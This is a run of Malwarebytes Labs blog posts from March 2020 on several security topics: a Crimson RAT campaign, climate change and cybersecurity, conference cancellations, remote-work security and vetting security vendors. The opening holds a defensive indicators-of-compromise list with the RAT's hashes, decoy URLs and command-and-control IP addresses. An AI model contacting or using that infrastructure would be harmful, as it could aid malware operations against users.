While most general users needn’t worry about nation-state attacks, organizations wanting to protect against this threat should consider using an endpoint protection system or endpoint detection and response with exploit blocking and real-time malware detection.

Shoring up vulnerabilities by keeping all software (including Microsoft Excel and Word) up-to-date shields against exploit attacks. In addition, training employees and users to avoid opening coronavirus resources from unvetted sources can protect against this and other social engineering attacks from threat actors.

Malwarebytes users are protected against this attack. We block the malicious macro execution as well as its payload with our application behavior protection layer and real-time malware detection.

Indicators of Compromise

Decoy URLs

[.]email/?att=1579160420
[.]email/?att=1581914657

Decoy documents

Crimson RAT

0ee399769a6e6e6d444a819ff0ca564ae584760baba93eff766926b1effe0010
b67d764c981a298fa2bb14ca7faffc68ec30ad34380ad8a92911b2350104e748

107.175.64[.]209
64.188.25[.]205

MITRE ATT&CK

The post APT36 jumps on the coronavirus bandwagon, delivers Crimson RAT appeared first on Malwarebytes Labs.

Categories: Malware Bytes

The effects of climate change on cybersecurity

Malware Bytes Security - Fri, 03/13/2020 - 2:55pm

Outside the coronavirus pandemic and its related healthcare and economic fallout, climate change and cybersecurity are seen by many as the two most urgent problems facing our planet now and in the near future. They are two distinct and separate problems, to be sure. There are some areas, however, where security and climate change overlap, interlock, and influence one another. Let’s have a look.

To understand how climate change and the methods to counteract its rapid ascent will affect cybersecurity, we first have to look at how computing contributes to global warming. Your first instinct about their relationship is probably right: computing involves energy consumption and heat production. As long as we cannot produce enough “clean energy” to satisfy our needs for electricity, the energy consumed by computing—and security within it—will continue to contribute to global warming.

The big energy consumers

There are a few fields in computing and cybersecurity that guzzle up huge amounts of energy and produce heat as a byproduct:

  • Supercomputers
  • Blockchain mining
  • Data centers
  • The Internet as a whole

Before you dismiss the problem of the supercomputers (because you assume there are only a few of them)—even I was astounded to find out that there are over 500 systems that deliver a petaflop or more on the High Performance Linpack (HPL) benchmark. Most of these supercomputers consume vast amounts of electrical power and produce so much heat that large cooling facilities must be constructed to ensure proper performance. But in recent years, vendors have started to produce supercomputers that are more energy efficient.

In 2019, the mining of Bitcoin alone consumed more energy than the entire nation of Switzerland, which equals about one quarter percent of the world’s entire energy consumption. There are many more blockchains and cryptocurrencies, although Bitcoin is by far the largest energy consumer among them. This is mostly due to their operation on the proof-of-work concept and the high value of Bitcoin.

While cybercrime experienced a huge jolt in cryptomining in 2018, the frenzy has mostly died down as Bitcoin value dipped and plateaued. However, cryptomining continues as both a legitimate and illegitimate activity—especially because miners can switch to other cryptocurrencies when Bitcoin drops off.

An even bigger impact on energy consumption are data centers, which already use over 2 percent of the world’s total energy consumption, and that number is expected to rise fast. The prediction is based on the growing number of content delivery networks (CDN), more Internet of Things (IoT) devices, the growth of the cloud, and other colocation services. So, not only do computer centers consume massive amounts of energy, their use is expected to grow astronomically.

The Internet can’t be completely separated from the data centers that enable it. But despite the overlap, it’s still worth mentioning that the total energy consumption of the Internet as a whole lies at around 10 percent, which is more than the world’s total energy production from renewable sources such as wind and solar.

However, it’s fair to note that the Internet has taken over a lot of tasks that would have cost more energy or created a greater carbon footprint if they had been performed in the “old ways.” Consider, for example, the energy saved by working remote: the energy expended on the Internet and inside one’s home is far less damaging than the carbon monoxide released into the atmosphere by fossil fuels from a daily commute to the office.

Global warming’s trickle down effects

Conversely, global warming and its effects on the climate, environment, and economy do have a direct impact on our everyday lives, and that trickles down to cybersecurity. Some of the projected dangers include:

  • Flooding of certain areas
  • Prolongation of the wild-fire season
  • Spread of diseases
  • Economic costs
  • Scarcity of fresh water in certain areas

By 2030, climate change is projected to cost the global economy $700 billion annually, according to the Climate Vulnerability Monitor. And the International Organization for Migration estimates that 200 million people could be forced to leave their homes due to environmental changes by 2050.

Climate change and its implications will act as a destabilizing factor on society. When livelihoods are in danger, this will spark insecurity and drive resource competition. This does not only have implications for physical security, but in modern society, this also has an impact on cybersecurity and its associated threats.

From a big picture, worst-case-scenario perspective, climate change could trigger profound international conflicts, which go hand-in-hand with cyberwar. Beyond nation-state activity, individuals that have no other means of providing for their families could turn to cybercrime, which is often seen as a low-risk activity with a potentially high yield.

But on a smaller scale, we’re already seeing the impacts of climate change on cybersecurity, whether via social engineering scare tactics embraced by threat actors or disruptions to Internet-connected home heating and cooling devices meant to track energy consumption.

Global warming scams

NO, we’re not saying that climate change is a hoax or a scam. But we want to issue a warning related to the subject. As with any newsworthy topic, there are and will be scammers trying to make a profit using the feeling of urgency that gets invoked by matters like climate change.

For example, the Intergovernmental Panel on Climate Change (IPCC) issued a warning against several scams abusing their name.

“IPCC has been made aware of various correspondences, being circulated via e-mail, from Internet Web sites, and via regular mail or facsimile, falsely stating that they are issued by, or in association with, IPCC and/or its officials. These scams, which may seek to obtain money and/or in many cases personal details from the recipients of such correspondence, are fraudulent.”

Natural disaster scams are increasing at the same rate as natural disasters themselves, often claiming to collect donations for a particular cause while putting the money in the scammers’ own pockets instead. We’ve seen social engineering tricks ranging from phishing emails and malspam to social media misinformation campaigns on hurricanes, tornadoes, fires, and flooding. Expect this sort of gross capitalization on tragedy and fear to continue as the effects of climate change become more dramatic.

Improving efficiency and preparing for changes

The number of data centers is down, but their size has grown to meet demand. This is potentially a step in the right direction, since consolidation reduces the power spent on overhead, but it is not as big a step as could be made if operators actually worked on their power efficiency.

Online companies typically run their facilities at maximum capacity around the clock, regardless of the demand. As a result, data centers are wasting 90 percent or more of their power. Smart management could make a substantial difference in energy consumption and costs.

Cryptomining could improve on energy consumption if the most popular currencies were based not on proof of work but on proof of stake. Proof of work rewards the largest number of CPU cycles, and with that, the highest energy consumption.

NEO and Hyperledger are next-generation blockchain technologies with much lower electricity costs. NEO uses what it calls delegated Byzantine Fault Tolerance (dBFT), which is an optimized proof-of-stake model. Hyperledger Fabric centralizes block creation into a single resource pool and has multiple validators among the participants. It’s an enterprise collaboration engine using blockchain smart contracts, where validation is much easier than creation, and creation is centralized on a single, optimized platform.

More effective methods of cooling would help both supercomputers and large data centers. At the moment, we are (ironically) using electricity to power cooling systems that control the heat caused by electricity usage. In fact, cooling gobbles up about 35 percent of the total power in high performance computing with air-cooled systems. Hot-water liquid cooling might be a key technology in future green supercomputers, as it maximizes cooling efficiency and energy reuse.

Interaction between climate change and cybersecurity

As we have seen, there are opportunities for those in security and computing to slow the progression of climate change. But there are also opportunities for those in cybercrime to take advantage of the destabilization caused by climate change, as some already have through related scams and malware campaigns. As long as we don’t drop security in attempts to counteract global warming, we’ll be able to protect against some of the more advanced threats coming down the pike. But while we still can, let’s rein in our carbon footprint, improve on computing efficiency, and remember our cybersecurity lessons when criminals come calling.

Stay safe, everyone!

The post The effects of climate change on cybersecurity appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Coronavirus impacts security conferences and events: check your schedule

Malware Bytes Security - Thu, 03/12/2020 - 2:02pm

With coronavirus starting to take hold globally, international travel restrictions are kicking in and more workplaces are advising to work from home whenever possible. When self-isolation is a potential solution, public gatherings are increasingly looking like a terrible idea. Events are becoming a bit of a hotspot for cases, leading to inevitably bizarre scenarios where coronavirus conferences are cancelled due to coronavirus.

Many major security conferences are already reassessing whether going ahead is worth it. Indeed, some cases of coronavirus have already been confirmed at RSA—one of the biggest security events on the planet. Given the number of attendees and the nature of their jobs (government and private security officials), that alone could have repercussions galore.

Some security events have decided to cancel outright, while others are going with the “temporarily postpone and see what happens at a later date” approach. While it’s tempting to suggest “just going virtual” as some are doing, that’s not always easily achieved.

Cancel, postpone, or virtual

Here’s a short rundown of some problems faced by event organisers in the wake of the current pandemic:

1) Putting on an event costs a lot of money. The venue, advertising, food, setup, safety, insurance, transportation to and from the event for organisers—it all adds up. People pay a ton of cash in advance to secure the event location, and not every venue operator is willing to hand $100,000 back if an event organiser phones up and says, “Actually, about that global pandemic…”

2) Lots of smaller conferences rely on sponsors. If sponsors suddenly bail without considering the impact of vanishing, the event could easily go under, and it won’t get a second attempt the following year. In turn, this (combined with the difficulty in recovering venue fees) could force some events into going ahead or facing financial ruin. It’s in everyone’s best interest to work together as much as possible in those situations, and see if there’s a possibility of going virtual.

3) I’ve helped with a few online events in the past—only small ones—and it was difficult. You can’t just throw up a website and yell “job done!” Streaming can be expensive. Locking down the site and figuring out how to only give content to paying virtual attendees isn’t straightforward. Which time zone are you aiming for when the event happens, and do you even need to stream?

It’s all online anyway, so would it be better to simply record everything and lock it behind a portal somewhere? What software will you use? Does your license accommodate your plans? Can you afford an upgrade if it doesn’t? Will the tech go wrong during the event, and what sort of contingency plans are in place if it does? These are just some of the questions waiting in store for intrepid event folks.

Taking stock of the situation

It’s difficult enough running a virtual event from scratch. I can’t imagine the stress of finding out you suddenly have to switch everything to online or shut everything down at short notice.

While it may end up costing less than a physical event, it may well cause more headaches than planning for the real world, where there’s a fairly solid set of event planning criteria/expectations.

With this in mind, and with a growing collection of security events going into lockdown, we thought it’d be good to pass you a few handy lists that explain what’s going on in security conference land for the foreseeable future. 

The current state of play

In a nutshell, the current state of play is “bad.” Wild West Hackin’ Fest is one example of an event having to cancel, and losing a lot of money in doing so, to keep people safe from harm. They’ve decided to go virtual, just like Kernelcon, which announced its decision today to do the same thing. Good luck to them both.

Meanwhile, the first major roundup of affected events over on ZDNet grew from nine to 22 in just two days. As per the list itself, some notable changes to your potential event schedule:

  • Black Hat Asia and DEF CON China are both postponed
  • Notable BSides events, including Budapest and Vancouver, are postponed, though Charm (Baltimore) is giving the option to go virtual alongside real-world presenting
  • Kaspersky’s incredibly popular Security Analyst Summit is also postponed
  • Infosecurity Belgium, a huge trade event, has been postponed

Those are just some of the big shakeups heading the infosec industry’s way. That list is constantly being updated, as is the comprehensive listing by region over on Infosecurity Conferences.

More disruption is likely

Regardless of which list you use to keep yourself informed, there will absolutely be more events affected in days to come. Your workplace may already have implemented no-travel policies, but even if you’re going it alone, you may wish to give some events a pass this time around.

Of course, that advice isn’t exactly good news for people who make their living from organising these events or even speaking at them. Whatever your involvement in security conferences, it’s going to be a rough old time of it for the foreseeable future. Stay safe and be well.

The post Coronavirus impacts security conferences and events: check your schedule appeared first on Malwarebytes Labs.

Categories: Malware Bytes

RemoteSec: achieving on-prem security levels with cloud-based remote teams

Malware Bytes Security - Thu, 03/12/2020 - 12:53pm

The world of work is changing—by the minute, it feels these days. With the onset of the global coronavirus pandemic, organizations around the world are scrambling to prepare their workforce, and their infrastructure, for a landslide of remote connections. This means that the security perimeter of businesses small and large has transformed practically overnight, requiring IT leaders to rethink the way they’re protecting their organizations. 

Even before the spread of the virus, preparing business security protocols for a mixture of remote and on-premise work had become a foregone conclusion. With increasing globalization and connectedness, remote work is fast supplementing, if not outright replacing, traditional 9-5 office-based hours. Upwork Global predicts that by 2028, up to 78 percent of all departments will have remote workers.

This trend is affecting companies of all sizes. In fact, a study by Owl Labs indicates that smaller companies are twice as likely to hire full-time remote workers, and a State of Telecommuting study found that telecommuting grew by 115 percent over the last decade. 

These numbers clearly show that remote work is here to stay, whether in quick response to dire crises or simply as a slow, societal shift. What companies are now grappling with is how to manage a ballooning remote workforce, and more so, the security challenges that come with that growth. 

In the past, traditional work made it easy to create and enforce on-prem security policies. Simple controls like logical and physical access were handled through a centralized command and control hierarchy. As workforces become increasingly distributed, such security hierarchies are starting to underdeliver. Companies are now faced with novel security challenges posed by the diverse work conditions remote workers operate within. 

The rise of RemoteSec

Remote Security, or RemoteSec, is a set of security tools, policies, and protocols that govern the IT infrastructure supporting remote teams. As most remote workers rely heavily on cloud tools and platforms, RemoteSec addresses security challenges that almost always fall under this category, though other tools, such as virtual private networks (VPNs), play a role, as they are often deployed to establish secure connections to the cloud.

For any business working with remote teams, understanding the role cloud security plays in securing remote teams is crucial to realizing overall remote security. However, one challenge that remains is how to replicate the success of on-prem security within a cloud environment. 

Before we delve into the details of RemoteSec, it’s crucial to note the difference between RemoteSec and overall cybersecurity policy. While both deal with securing networked resources, RemoteSec focuses mostly on securing remote teams and the cloud resources they use. As such, organizations with cybersecurity policies may need to extend them to cover security issues that emerge when remote workers relying on cloud infrastructure are added to the workforce matrix. 

Crucial RemoteSec considerations

Remote workers—which include freelancers, contractors, or in-house employees working from home, in coworking spaces, or at coffee shops—do their jobs under a diverse set of conditions. These unique and unpredictable conditions form the body of challenges RemoteSec addresses. 

For example, 46 percent of staff members admit to moving files between work and personal computers while working from home. A further 13 percent admit to sending work emails via personal email addresses because they are unable to connect to an office network. 

With these challenges in mind, here are some crucial RemoteSec considerations you should focus on to secure your remote teams. 

Global location of employees

Remote workers that are spread across the globe face different security challenges. As each part of the world has its own unique IT infrastructure characteristics, it is essential to standardize remote work environments for your entire team. Using VPNs and virtual desktops can help provide a uniform and secure work environment for your remote team, regardless of where in the world they are located.

Remote data security policies

Data security is a significant challenge when working with remote teams. For example, remote workers may access public unsecured Wi-Fi hotspots, exposing company data to eavesdroppers or cybercriminals. Also, remote workers may use free data storage tools like Google Drive without knowing that such tools are vulnerable to ransomware attacks.

RemoteSec addresses these issues through comprehensive cloud data policies that cover remote data access, public hotspots, USB devices, password management, device management, network compliance, and others. 

IT and network infrastructure

Endpoint security is another area that organizations must address when it comes to RemoteSec. Remote workers tend to use multiple endpoints (devices) to access company resources. However, in many instances, these devices may not be secure or may be connecting through unsecured network channels.

Issuing mobile device management (MDM) policies, using secure VPNs, deploying cloud-based endpoint security on all remote devices, and enforcing secure cloud network protocols can ensure remote workers do not circumvent network or endpoint security measures. 

Remote IT support

Not all remote workers are tech-savvy. As more roles move to remote, non-technical remote workers may face challenges accessing IT support. If a remote worker halfway across the world experiences technical problems, they may turn to non-secure, outside IT support, exposing your company’s confidential resources. Using cloud tools to deliver IT support can help maintain seamless security across your technical and non-technical remote workforce. 

On-prem security tools vs. cloud-based RemoteSec 

Most companies extol the virtues of on-prem security and rightly so. On-prem security is the gold standard of information security. However, that standard falls apart when stood up against today’s hybrid workforce of remote teams and in-house professionals using a diverse range of endpoints—especially when that workforce is quickly ushered back into their homes for safety purposes. Why? Because on-prem security protocols are designed to contain information in an airtight box. 

Cloud and remote teams not only open that box, but they also turn the organization into an open platform with multiple access points and endpoints. So, how can an organization achieve on-prem security levels with remote teams in the cloud? The answer lies in using the right security tools to migrate your organization from an on-prem mindset to one that considers remote security equally. 

Cloud security tools include virtual desktop infrastructure, file system snapshots, remote data and activity monitoring, and remote device encryption and data wipes. Such mechanisms not only safeguard company data, but also give more control over IT resources used by remote workers.

In addition, deploying a single sign-on service with multi-factor authentication can better protect company data stored in the cloud, as well as assist in access management. VPNs, both desktop and mobile, can further provide authentication while also encrypting network traffic and obscuring private details, which may be necessary while connecting in public places.

A massive shift

Cloud services, at once the hero and villain of information security, will prove to be an ace up the sleeve for companies transitioning away from underperforming on-prem security standards. While remote work seems to have caught on—and is sometimes necessary—we are only at the beginning of a massive tectonic shift in how work is done. 

RemoteSec, therefore, is an emerging field in security, one that’s been discussed for years but never quite tested to this degree. As organizations gain more remote workers, the need to embrace RemoteSec at the forefront of cybersecurity policy will only escalate. Addressing the crucial areas outlined above can help organizations mitigate the emerging risks while embracing a remote workforce.

The post RemoteSec: achieving on-prem security levels with cloud-based remote teams appeared first on Malwarebytes Labs.

Securing the MSP: best practices for vetting cybersecurity vendors

Malware Bytes Security - Wed, 03/11/2020 - 11:44am

Ironically, to keep costs low for their enterprise and mid-market clients, managed service providers (MSPs) are some of the most reliant on third-party vendors—including those providing security. While this is generally not an indication of dysfunction or vulnerability, the responsible MSP will be looking with a critical eye while vetting cybersecurity vendors to evaluate how they might increase the organization’s attack surface—especially with the uptick in targeted attacks over the last few months.

So how should an MSP—or any organization, for that matter—evaluate cybersecurity vendors not just for budget and effectiveness, but also security posture? And how can MSPs continue to monitor their security partners as product features and organizational needs change over time?

What’s concerning from a Chief Security Officer’s (CSO’s) perspective is the veneer of legitimacy many cybersecurity vendors are capable of producing: Scammy security companies generally have slick, professional websites, convincing sales engineers, legions of onshore support administrators, and almost invariably, one or more executives with ties to a government intelligence agency, whether in the US or abroad.

Given that almost all cybersecurity companies on the market strive to project an image of professionalism, how can a CSO sort out companies that are a value add from those with a less than legitimate business model? And what about the companies that are above board, but just not very good? Let’s take a look.

The ugly cybersecurity vendors

Most harmful to a business in the long run are the cybersecurity vendors who either don’t do much, or have a business model that skirts the edge of the law. The simplest and most cost effective way of avoiding these companies is conducting a community temperature check.

Bad vendors tend to acquire a collective disapproval in the infosec community long before their business model fails. A quick Twitter or Google search of the vendor name can often reveal detailed accounts by analysts who have used them and can provide candid assessments.

But the gold standard for a temperature check is to ask your own team. Cross-pollination of infosec personnel is at an all time high. As such, your team most likely has a broad range of experience with multiple vendors on a host of platforms.

Your team can provide invaluable data, like added operations costs over the long term, company billing practices, and interoperability with existing systems. They can also tip you off on issues with vaporware, generally defined as giving the appearance of having a product or feature that is in reality much more limited or even non-existent.

Like most vendors of higher quality, the ugly will also have former intelligence agency personnel to give themselves a veneer of authority and competence. A question that rarely gets asked, though, is “Which agency?” Is it an agency with a formal mandate for addressing cyberthreats, with an established university pipeline and well-regarded reputation? Is it an agency whose cyber division was stood up relatively recently, with repurposed employees from other departments?

Further, how relevant is that experience to your business needs? If the majority of your security losses are coming from phishing and malvertising, is having access to analysts experienced in state-sponsored intrusions really relevant?

The bad cybersecurity vendors

Some infosec vendors really do try their best to provide a valuable product to the end user, but still fall awfully short of the mark. The problem here isn’t that they’re not trying to deliver a good product—it’s that they don’t necessarily understand what “good” is to you.

In the public sector, intelligence is often defined as information that is timely, accurate, and relevant. This applies to cyberthreat intelligence derived from security products as well. If you kick out any one of the legs on the threat intelligence tripod, you’re left with a platform too unstable to make any reliable judgement on cyber risk.

An organizational threat delivered to SOC personnel in a timely manner that hasn’t been vetted (i.e., is inaccurate) is not intelligence. Threat data that is timely and accurate, but not adapted to your business vertical (i.e., is irrelevant) is also not intelligence.

What these threat alerts amount to tends to be a drag on organizational resources, as in-house security personnel are tasked with vetting ever-increasing quantities of data that don’t address business needs. Don’t those tier-two SOC techs have better things to do than retrace vague, un-targeted analysis?

Bad cyberthreat intel vendors often correctly identify the desired end goal of intelligence, but lack an understanding of appropriate methodology. Again, these companies often out themselves as undesirable with a quick community check.

A poorly sourced, unreviewed report using inflated claims will quickly reveal itself as such when the infosec community reviews the content. Timely, accurate, and relevant threat data will be shared, retweeted, and commented upon much more frequently than less useful sources. Pausing for a moment to see how other organizations have integrated the threat data being offered to you can provide a valuable check against letting a bad vendor slip through the cracks.

Some questions to ask the sales engineer:

  • How will this data be tailored to my organization?
  • How is the data delivered to us, and if it’s a portal, what is your upgrade release schedule?
  • And most importantly: How do you vet your sources?

Note: do not accept “We have to protect our sources and methods.” This is a phrase borrowed from government intelligence agencies, which generally use it in situations involving threats to human lives. More commonly, it’s used to express sentiments akin to “I’m not going to tell you because I don’t want to, don’t know, or it would embarrass me.”

The good cybersecurity vendors

Here’s the most difficult category and the holy grail for augmenting your security team: a company that delivers well-targeted services to your organization in a manner that is timely, accurate, and relevant. The catch here is that to properly spot the good company, your own organization has to have timely, accurate, and relevant defined down to a T. This brings us to the last and most important aspect of vetting: metrics.

Certain companies can provide an awfully impressive “real-time demonstration” of the product, sometimes offering you a head-to-head with competing products. They might reference the number of threats detected, speed of detections, analysis, or number of endpoints providing data.

There is a barrage of cybersecurity metrics available to benchmark performance, so how do you know which are valuable? The answer is: none of them. The only metric relevant to evaluating security performance is one that has been generated by your own team against a mature risk tolerance posture. Vendor metrics can’t possibly address the various risk tolerances of all their customers and therefore can’t be relevant to how they would perform for you. Once you know your own metrics, evaluating vendors can be a piece of cake. (And requires far fewer meetings.)

Some questions to ask the relationship manager for a great vendor:

  • How can I share feedback from my security team?
  • When can we revisit my business needs?
  • What improvements do you have planned for next quarter?

To sum up, vetting vendors doesn’t have to be painful—as long as you know your own risk tolerance posture, and have a mature communication channel with your own security team.

The post Securing the MSP: best practices for vetting cybersecurity vendors appeared first on Malwarebytes Labs.
